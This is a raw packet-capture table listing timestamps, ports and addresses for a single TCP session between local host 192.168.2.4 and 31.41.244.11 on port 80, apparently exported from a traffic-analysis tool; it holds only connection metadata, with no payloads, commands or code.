Dec 14, 2024 12:56:10.209686995 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.209716082 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.213308096 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.213342905 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.213378906 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.213398933 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.216880083 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.216953993 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.217036963 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.217096090 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.221576929 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.221652985 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.221713066 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.221771002 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.226190090 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.226263046 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.226340055 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.226396084 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.230839014 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.230907917 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.231014013 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.231070995 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.235598087 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.235635996 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.235682964 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.235722065 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.240048885 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.240119934 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.240369081 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.240425110 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.245263100 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.245299101 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.245347023 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.245369911 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.249910116 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.249963999 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.249980927 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.250022888 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.257241964 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.257328033 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.329549074 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.329643965 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.329921007 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.329921961 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.331377983 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.331419945 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.331559896 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.331559896 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.334630966 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.334741116 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.334793091 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.334829092 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.339034081 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.339174986 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.339282990 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.339519024 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.343405008 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.343429089 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.343575001 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.347153902 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.347265959 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.347429037 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.347626925 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.351046085 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.351110935 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.351286888 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.351349115 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.354732037 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.354799032 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.354841948 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.354901075 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.358390093 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.358455896 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.358480930 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.358541965 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.362142086 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.362215996 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.362262964 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.362328053 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.366200924 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.366262913 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.366297007 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.366355896 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.369519949 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.369584084 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.369627953 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.369687080 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.373187065 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.373248100 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.373294115 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.373342991 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.377103090 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.377165079 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.377206087 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.377274990 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.380582094 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.380645990 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.380686045 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.380742073 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.384289980 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.384391069 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.384485006 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.388169050 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.388184071 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.388453007 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.389796019 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.390021086 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.390108109 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.390108109 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.391586065 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.391657114 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.391757965 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.391820908 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.393358946 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.393420935 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.393451929 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.393508911 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.395242929 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.395301104 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.395318985 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.395375967 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.396970987 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.397031069 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.397068977 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.397125006 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.398739100 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.398804903 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.398845911 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.398907900 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.400533915 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.400599003 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.400636911 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.400696039 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.402327061 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.402388096 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.402439117 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.402498007 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.404123068 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.404186010 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.404227972 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.404285908 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.405982018 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.406045914 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.406111002 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.406172037 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.407865047 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.407928944 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.407953978 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.408014059 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.409487963 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.409548044 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.409634113 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.409694910 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.411339998 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.411400080 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.411433935 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.411494017 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.413145065 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.413206100 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.413252115 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.413311005 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.414870024 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.414931059 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.415011883 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.415072918 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.416697979 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.416759968 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.416773081 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.416831017 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.418495893 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.418550014 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.418593884 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.418652058 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.420310974 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.420363903 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.420375109 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.420423031 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.422116995 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.422179937 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.422277927 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.422334909 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.423973083 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.424024105 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.424032927 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.424082041 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.425630093 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.425688982 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.425734997 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.425801992 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.427509069 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.427572012 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.427665949 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.427727938 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.429219007 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.429280996 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.429373980 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.429431915 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.431008101 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.431068897 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.521207094 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.521254063 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.521420002 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.521496058 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.521738052 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.521809101 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.521912098 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.521975040 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.523499012 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.523561001 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.523617983 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.523703098 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.525299072 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.525360107 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.525398016 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.525458097 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.527096033 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.527158022 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.527221918 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.527282000 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.528899908 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.528966904 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.528995037 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.529048920 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.530675888 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.530738115 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.530775070 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.530838013 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.532480001 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.532538891 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.532588005 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.532644033 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.534296989 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.534368992 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.534526110 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.534583092 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.536047935 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.536130905 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.536175013 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.536240101 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.537836075 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.537899017 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.537909031 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.537957907 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.539649963 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.539730072 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.539758921 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.539788961 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.541348934 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.541419983 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.541491032 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.541548967 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.543049097 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.543116093 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.543163061 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.543222904 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.544761896 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.544848919 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.544929028 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.544987917 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.546462059 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.546528101 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.546669960 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.546727896 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.548216105 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.548307896 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.548335075 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.548397064 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.549956083 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.550014019 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.550055027 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.550107956 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.551662922 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.551728010 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.551748991 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.551805019 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.553356886 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.553415060 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.553462982 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.553518057 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.555063963 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.555125952 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.555171967 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.555233002 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.556792021 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.556866884 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.556906939 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.556967974 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.558522940 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.558590889 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.558628082 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.558685064 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.560254097 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.560322046 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.560353041 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.560410023 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.562222958 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.562287092 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.562321901 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.562378883 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.563702106 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.563764095 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.563787937 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.563849926 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.565390110 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.565462112 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.565584898 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.565640926 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.567073107 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.567128897 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.567174911 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.567229986 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.568834066 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.568890095 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.568937063 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.568989992 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.570508957 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.570566893 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.570642948 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.570704937 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.572254896 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.572375059 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.572422028 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.572422028 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.574028015 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.574085951 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.574110031 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.574177980 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.575637102 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.575707912 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.575732946 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.575788975 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.577275038 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.577330112 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.577378988 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.577434063 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.578948975 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.579005003 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.579061031 CET	80	49760	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:10.579117060 CET	49760	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:10.580652952 CET	80	49760	31.41.244.11	192.168.2.4
